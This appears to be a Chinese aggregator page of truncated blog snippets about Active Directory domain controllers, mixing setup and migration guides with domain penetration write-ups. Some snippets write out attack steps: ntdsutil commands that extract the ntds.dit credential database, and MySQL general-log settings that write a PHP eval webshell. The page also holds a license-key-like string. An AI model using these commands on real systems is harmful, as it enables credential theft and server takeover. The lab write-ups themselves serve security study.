ICode9

先说需要开放的端口 Microsoft-DS traffic : 445/TCP 445/UDP Kerberos : 88/TCP 88/UDP LDAP : 389/TCP 389/UDP DNS : 53/TCP 53/UDP 全局编目 (GC) 端口: 3268/TCP 3268/UDP 输入由已选择的 LDAP 服务器使用的侦听端口号（缺省值 = 389）。 如果网络中有多个 Active Directory

JC09U-0GK1K-M8EF0-0H3E0-3YR1A                                                 域控账号密码            

          域控账号密码            

windows server 2016 active directory 域控 BDC 转换 为 PDC 副域控 升级 为 主 域控 域控 环境 有 主（PDC primary Domain controller） 备（BDC backup domain controller） 域控服务器 在某些场景下，需要把备域控 BDC 转换 好 主域控 （PDC） 在主备 服务器都在线状态下 BDC 转换 为 PDC

一域控制器 windows server2012中域控制器包括3中类型：额外域控制器、域控制器以及只读域控制器。 如果网络中安装的是第一台域控制器，该服务器默认为林根服务器，也是根域服务器，FSMO（操作主机）角色默认安装到第一台域控制器。（FSMO角色文章下面会有详细介绍） 如果是额外域控制器，FSMO（操作

最近做了一些靶场域渗透的实验，记录下一些关于白银票据和黄金票据的问题。 0x01 白银票据的利用 1 环境信息 域控DC 192.168.183.130 域内主机win7 192.168.183.129 2 使用场景 在拿到一个普通的域成员权限的时候，可以尝试使用ms14-068伪造一个票据，从而让我们的域用户有域管

公网JBoss getshell JBoss未授权访问，进入JBoss管理控制台可以通过加载远程的war来部署木马。 可以手工写入webshell，但是我使用手测出报错。 可以使用下面的exp，jexboss还是非常好用的，可以反弹msf，也可以代理模式运行。 https://github.com/joaomatosf/jexboss.git 通过jexbos

一台域控制器win2012总是莫名其妙重启，趁放假重装。 新系统是win2019,加入域时遇到两只虎： 第一只虎：需要提升林和域功能级别 提示总是连接不上域控制器，一看域控制器名称，是以前的遗留的机器 请出Ntdsutil 搞定。 第二只虎：提示：副本验证失败，指定域文件复制服务FRS 复制 SYSVOL。 FRS

安装AD域控、提升为域控制器 至此，域控服务器初步部署完毕

目录1 SID 作用2 利用 SID History 操作过程3 SID History 权限维持的防御 1 SID 作用 ​ 每个用户都有自己的SID，SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限，SID History是在域迁移过程中需要使用的一个属性。 ​ 如果A域中的域用户迁移到B域中，那么该用户的SID值就

公司电脑使用域管理，自己的员工账号是无法直接修改系统环境变量的，因为这点小事再去找IT也显得太low了哈，其实可以自己修改注册表来实现： 在注册表中定位到Computer\HKEY_CURRENT_USER\Environment位置，直接修改Path项的内容，在末尾追加自己要添加的新的路径就可以了，ps：记得在新的路

一、通过ntdsutil.exe提取ntds.dit 1.在域控制器的命令行环境中创建一个快照 ntdsutil snapshot "activate instance ntds" create quit quit 2.加载创建的快照 ntdsutil snapshot "mount {b0694058-f87c-410c-85fa-0b6dc9d297d7}" quit quit 3.复制快照中的文件 copy C:\$SNAP_20

目录 代码审计 GetshellBypass 突破执行命令拿到宝塔后台权限拿到第一个 root.txt 内网渗透一内网横向移动-192.168.59.4 内网渗透二内网渗透-10.10.10.202CVE-2020-1472 拿到域控 总结结尾 本次靶场要求： 四个 root.txt 分别在四台机子用户目录下 拿到三个及格 拿下四

系统环境：windows server 2012 R 1角色安装 1.1在需要添加为域控制器的服务器上打开“服务器管理器”，点击“添加角色和功能 1.2安装类型选择“基于角色或基于功能的安装”，点击“下一步” 服务器选择“从服务器池中选择服务器”，点击“下一步” 1.3服务器角色选择“Active Di

内网渗透之域渗透 文章目录 内网渗透之域渗透0x01 环境介绍1.实验环境靶场2.域环境初始化3.Kali 环境准备 0x02 WebLogic 漏洞利用并 getshell1.信息收集2.利用 CVE-2019-2725 0x03 域渗透-横向渗透获取域控最高权限1.Cobalt Strike 介绍2.Cobalt Strike 部署3.创建监听4.

文章目录 一、本章所用技术二、网络示意图三、信息收集3.1 端口扫描3.2 指纹识别一下（whatweb）3.3 目录扫描之gobuser 的高级用法 四、对目标进行渗透测试4.1 外部打点4.1.1 SVN信息泄露4.1.2 编写thinkphp3日志泄露工具4.1.3 子域名hosts碰撞找后台4.1.4 子域名后台上传web

ms14_068漏洞复现 域渗透思路及攻击方式ms14_068漏洞介绍漏洞复现漏洞利用前提 本文仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担 域渗透思路及攻击方式 进入到内网后先利用nmap等扫描工具，扫描内网主机，选择一个内网主机进行渗透利用该主机开启的端口

弱口令登录后台： 通过phpinfo获取网站路径： Mysql日志getshell： select user(); show variables like 'general%'; set global general_log="ON"; //设置打开 set global general_log_file="C:/phpStudy/WWW/shell.php" select "<?php @eval($_POST['

域控环境搭建 域控服务器系统版本：Microsoft Windows Server 2012 Datacenter 域控制器搭建 安装AD 剩下的默认即可 参考链接 内网渗透之域环境搭建

从这篇博文开始，所有的域控系统都是在虚拟机中创建的。在VM里安装Windows Server 2008 R2的方法就不多说了，无脑式安装，略过不提。进到系统桌面，打开本地连接，设置网卡的IP地址，如下图：注意，首选DNS的地址要跟上面的IP地址一致，为的是域控的DNS指向自己，因为我这里设置的系统即是一台域控也是

很久没有和大家分享了，近日完成了域控从Windows server 2008迁移到Windows server2012的实测，传将上来与大家共享，迁移的步骤和win2k3迁移到Win2k8基本相同，下图为AD迁移的基础架构示图: 首要做的就是备份AD，这是准备工作中的重点，一旦发生迁移故障中断，可以迅速恢复到原状态，以保证正

1、环境介绍 服务器配置： CPU：4c 内存：8G 硬盘：100G 网卡：千兆网卡 操作系统版本：windows 2016 2、添加AD域角色 1）打开开始菜单–》服务器管理 2）添加角色和功能 3）安装类型选择 4）选择服务器器 5）添加服务器角色，选择 Active Directory 域服务 6）添加功能 7）选择功能，直接下一步 8）A

横向移动环境:win2008: ZJW2.com 192.168.227.140win7: 192.168.227.141kali: 192.168.227.129概念:城内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术， 尤其是在高级持续威胁(Advanced Persistent Threate APT)中。攻击者会利用该技术，以被攻陷的系统为跳板，访问其他域内主

设置>用户与群组>登陆选项>网络账户服务器(编辑)>添加域控的域名>域控管理员密码>打开目录实用工具>编辑AD>是否要把某些域控组授权管理权限

cve-2020-1472,netlogon特权提升漏洞， 漏洞原理：攻击者通过NetLogon（MS-NRPC），建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本号： Windows Server 2008 R2 for x64-based Systems Se